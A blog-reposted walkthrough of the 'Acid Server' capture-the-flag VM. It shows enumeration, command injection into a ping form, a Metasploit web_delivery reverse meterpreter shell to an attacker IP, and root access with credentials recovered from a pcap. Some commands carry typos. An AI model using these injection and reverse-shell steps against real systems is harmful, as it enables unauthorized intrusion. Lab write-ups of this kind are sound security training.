Chuyển đến nội dung chính

Hack the Acid VM (CTF Challenge)

The name of the Virtual machine is “Acid Server” that we are going to crack.  It is an Boot2Root Vm that we are going to solve. This is a web-based VM. Our main goal is to escalate the privileges to root and capture the flag.
WalkThrough
As always start by finding the target.
netdiscover

Our target is 192.168.0.105. Now fire up nmap to scan the ports.
nmap –p- -A 192.168.0.105

Nmap results in showing that there is only one port open i.e. 33447 with the services of HTTP. Please observe here that port 80 is not open that means if we want to open this IP in the browser then we have to use the port number as it will not open it by default. So now open the web page using the port number.
There is only a heading and a quote on the page; nothing else but if you look at the tab on the browser, it says “/Challenge”. This can be a directory. Let’s open it.
Upon opening /Challenge, a log in portal will open. Let’s learn more about /Challenge by using DirBuster. Copy the link from the browser in Target URL box and then select 2.3-meduim word list in Files with the list of dirs/files box by clicking on browse button. And then click on Start.
Clicking on start button will provide the list of directories.

I went through every directory but only cake.php was useful. Open it in the browser. When you open cake.php, the page says “ah.haan…There is long way to go..dude J”. But upon looking closely you will find the /Magic_Box is written on the tab. Lets open it in the URL just like before.
When you open the /Magic_Box it says that access to the page is forbidden. OK! There is no problem in that. Let’s use DirBuster on it. Give the URL and 2.3 meduim wordlist just as before and then click on start button.
In the result it will show the name of the directories.

Out of all those command.php is the only one that has proved to be useful. Open it in the URL.

Here you will find a ping portal that means you can ping any IP address from here. Let’s try and ping an IP. (You can ping any IP but I am going to ping the default IP i.e. 127.0.0.1).
Once the ip has been pinged, go to the page source. On the page source you can contemplate that results of ping is showing.
If the page is showing the result that means we can use this portal to inject our virus using web_delivery exploit. And to do so, go to the terminal of Kali an open metasploit by typing msfconsole and then further type :
use exploit/multi/script/web_delivery
set target 1
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.104
set lport 4444
exploit
This exploit is a multi exploit that means it can used on multiple programs. Therefore, I have set the target as one because 1 refers to php and as we are using php payload we have to set target as 1.
Now performing this exploit will give you a code. Copy this code and paste it on ping portal after the IP that you are using to ping. And to add this code use semi-colon (;).
127.0.0.1; *<code>*
As soon as you click on submit, you will have a meterpreter session in metasploit. When you have the session the type the following commands to reach terminal:
shell
python –c ‘import pty; pty.spwan(“/bin/bash”)’
Further type the following command to see the list of directories:
ls / l
In the list you will find a directory called s.bin. let’s go into the folder and see its list of files and for that type :
cd /s.bin
ls
Here, you will find a php file. Lets read it.
cat invesgitate.php
When you read it, it shows you a message i.e. “now you have to behave like n investigator to catch the culprit”.
In the list of directory that was previously previewed also had a folder sbin. Let’s get into that folder and see the lists of files and to do so type:
cd sbin
ls
In the list of files you can see a file named raw_vs_isi. Let’s check it out.
cd raw_vs_isi
ls
It contains only on file, called hint.pcapng. This is wireshark file and there are many ways to download this file but they are usually very lengthy. So I have used a shortcut. Simply terminate your shell session and go back to meterpreter session
There check where you are currently working and for that type:
pwd
ls
And then type:
Download hint.pcapng /root/Desktop/hint.pcapng

Now the file is downloaded on your desktop. I explored it every packet and found a conversation in the TCP stream of 90th packet. Just right click on the said packet and then click on Follow option and then select TCP stream.
It will open the conversation as shown in the image below:

In the conversation on eof them says “saman and now a days he’s known by the alias of 1337hax0r” that means saman is the usernam and 1337hax0r can be the password. Let’s try it. Type shell again to reach the terminal and here log in with the username we just found:
su saman
1337hax0r
Sudo saman
1337haxor
And so you have entered the root. Now go into the folder root and see what it has to offer:
cd /root
ls
cat flag.txt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.
Nhãn:

Bài đăng phổ biến từ blog này

Pentest lab - Metasploitable 2

Today I will walk through different ways of exploiting Metasploitable 2, the newer release of Rapid7’s popular vulnerable machine. First, what is Metasploitable? Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. In my lab environment, the IP of the attacker machine is 192.168.127.159, and the victim machine is 192.168.127.154. Since this is a test lab, I won’t be concerned about stealth. Instead, I will try to get the most information out of the scans. Let’s start by port scanning the target with nmap. I did a full port, aggresive scan against the target. Here are the results. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 ...
Đọc thêm

Metasploitable 2 vulnerability assessment

A vulnerability assessment is a crucial part in every penetration test and is the process of identifying and assessing vulnerabilities on a target system. In this part of the tutorial we will be assessing the vulnerabilities available on the network side of the Metasploitable 2 virtual machine. We will be assessing the web applications on the Metasploitable 2 machine in a later tutorial. In the previous Metasploit enumeration and fingerprinting tutorial we’ve learned that the Metasploitable 2 machine contains a lot of vulnerabilities. We have collected valuable information about the target system which we will be using to find known vulnerabilities both on- and offline. Exploitation of these vulnerabilities will be demonstrated in the next exploitation tutorial. In this tutorial we will be looking at a few different ways to perform vulnerability analysis. We will be manually searching for exploits, use scanning tools like Nmap with scripts and we will be...
Đọc thêm

CEH v9 (CEHVIETNAM.COM) - Hacking Metasploitable Lab

CEH v9 : Hacking Metasploitable VM In this guide, I will demonstrate how to root a Metasploitable 2 virtual machine. Metasploitable is an intentionally vulnerable Ubuntu machine. I’ll explore just a few of the many ways Metasploitable can be attacked, from vulnerabilities in common services to little known exploits and web vulnerabilities. I’ve set up Kali Linux and Metasploitable VMs in VirtualBox on the same network (bridged mode). Kali – 192.168.56.101 Metasploitable – 192.168.56.102 - Hãy thay IP của bạn cho thích hợp Contents   1 Footprinting 1.1 Ping 1.2 Traceroute 2 Scanning 2.1 Port Scanning 2.2 OS Fingerprinting 2.2.1 nmap 2.2.2 xprobe2 3 Enumeration 3.1 FTP (TCP 21) Enumeration 3.2 Telnet (TCP 53) Enumeration 3.3 SMTP (TCP 25) Enumeration 3.4 VNC (TCP 5900) Enumeration 3.5 X11 (TCP 6000) Enumeration 3.6 RLogin (TCP 513) Enumeration 3.7 IRC (TCP 6667) Enumeration 4 Exploitation 4.1 FTP Exploit 4.2 VNC Password Cracking 4.3 IRC E...
Đọc thêm